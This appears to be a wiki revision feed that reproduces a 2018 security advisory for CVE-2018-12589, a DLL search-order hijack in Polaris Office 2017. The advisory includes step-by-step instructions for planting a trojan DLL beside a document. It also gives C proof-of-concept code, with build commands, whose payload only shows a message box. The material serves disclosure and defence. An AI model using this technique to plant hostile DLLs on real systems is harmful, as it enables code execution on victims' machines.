<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-12589_Polaris_Office_2017_8.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-12589 Polaris Office 2017 8.1 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-12589_Polaris_Office_2017_8.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-12589_Polaris_Office_2017_8.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T02:49:16Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-12589_Polaris_Office_2017_8.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1523&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; [+] Credits: John Page (aka hyp3rlinx)		 [+] Website: hyp3rlinx.altervista.org [+] Source:  http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REM...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-12589_Polaris_Office_2017_8.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1523&amp;oldid=prev"/>
		<updated>2021-04-11T01:59:33Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; [+] Credits: John Page (aka hyp3rlinx)		 [+] Website: hyp3rlinx.altervista.org [+] Source:  http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REM...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[+] Credits: John Page (aka hyp3rlinx)		&lt;br /&gt;
[+] Website: hyp3rlinx.altervista.org&lt;br /&gt;
[+] Source:  http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt&lt;br /&gt;
[+] ISR: Apparition Security          &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Vendor:&lt;br /&gt;
=============&lt;br /&gt;
www.polarisoffice.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Product:&lt;br /&gt;
===========&lt;br /&gt;
PolarisOffice 2017 v8&lt;br /&gt;
&lt;br /&gt;
Polaris Document Solution is an integrated solution for corporate document life cycle from document creation, use, management, security, and collaboration.&lt;br /&gt;
&lt;br /&gt;
Used by more than 70 million subscribers in 240 countries.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability Type:&lt;br /&gt;
===================&lt;br /&gt;
Remote Code Execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CVE Reference:&lt;br /&gt;
==============&lt;br /&gt;
CVE-2018-12589&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Security Issue:&lt;br /&gt;
================&lt;br /&gt;
Polaris Office 2017 8.1 allows attackers to execute arbitrary code via a Trojan horse &amp;quot;puiframeworkproresenu.dll&amp;quot; file&lt;br /&gt;
in the current working directory, due to a search order flaw vulnerability.&lt;br /&gt;
&lt;br /&gt;
1) create a 32bit DLL named &amp;quot;puiframeworkproresenu.dll&amp;quot; &lt;br /&gt;
2) put any .PDF or .PPTX file or whatever that is configured to open in Polaris Office in same directory as the above DLL &lt;br /&gt;
3) open the document (PDF etc) then BOOM our arbitrary DLL will execute on victims system.&lt;br /&gt;
&lt;br /&gt;
This can be observed as well with both the DLL and a document opened from a remote share.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Exploit/POC:&lt;br /&gt;
=============&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;windows.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
/* hyp3rlinx */&lt;br /&gt;
&lt;br /&gt;
/*&lt;br /&gt;
gcc -c -m32 puiframeworkproresenu.c&lt;br /&gt;
gcc -shared -m32 -o puiframeworkproresenu.dll puiframeworkproresenu.o&lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
void trojanizer(){&lt;br /&gt;
	 MessageBox( 0, &amp;quot;Continue with PWNAGE?&amp;quot; , &amp;quot;philbin :)&amp;quot; , MB_YESNO + MB_ICONQUESTION );&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){&lt;br /&gt;
	switch(fdwReason){&lt;br /&gt;
		case DLL_PROCESS_ATTACH:{&lt;br /&gt;
			 trojanizer();&lt;br /&gt;
			break;&lt;br /&gt;
		}&lt;br /&gt;
		case DLL_PROCESS_DETACH:{&lt;br /&gt;
			 trojanizer();&lt;br /&gt;
			break;&lt;br /&gt;
		}&lt;br /&gt;
		case DLL_THREAD_ATTACH:{&lt;br /&gt;
			 trojanizer();&lt;br /&gt;
			break;&lt;br /&gt;
		}&lt;br /&gt;
		case DLL_THREAD_DETACH:{&lt;br /&gt;
			 trojanizer();&lt;br /&gt;
			break;&lt;br /&gt;
		}&lt;br /&gt;
	}&lt;br /&gt;
	&lt;br /&gt;
	return TRUE;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Network Access:&lt;br /&gt;
===============&lt;br /&gt;
Remote&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Severity:&lt;br /&gt;
=========&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disclosure Timeline:&lt;br /&gt;
=============================&lt;br /&gt;
Vendor Notification: June 14, 2018&lt;br /&gt;
Vendor confirms vulnerability : June 19, 2018&lt;br /&gt;
Mitre assigned CVE : June 20, 2018&lt;br /&gt;
Vendor replied fix will be in July&lt;br /&gt;
however, update was released : June 23, 2018&lt;br /&gt;
Notified vendor of impending advisory : June 23, 2018&lt;br /&gt;
Vendor : &amp;quot;glad to hear that your problem has been solved&amp;quot;&lt;br /&gt;
June 26, 2018 : Public Disclosure&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Disclaimer&lt;br /&gt;
The information contained within this advisory is supplied &amp;quot;as-is&amp;quot; with no warranties or guarantees of fitness of use or otherwise.&lt;br /&gt;
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and&lt;br /&gt;
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit&lt;br /&gt;
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility&lt;br /&gt;
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information&lt;br /&gt;
or exploits by the author or elsewhere. All content (c).&lt;br /&gt;
&lt;br /&gt;
hyp3rlinx&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>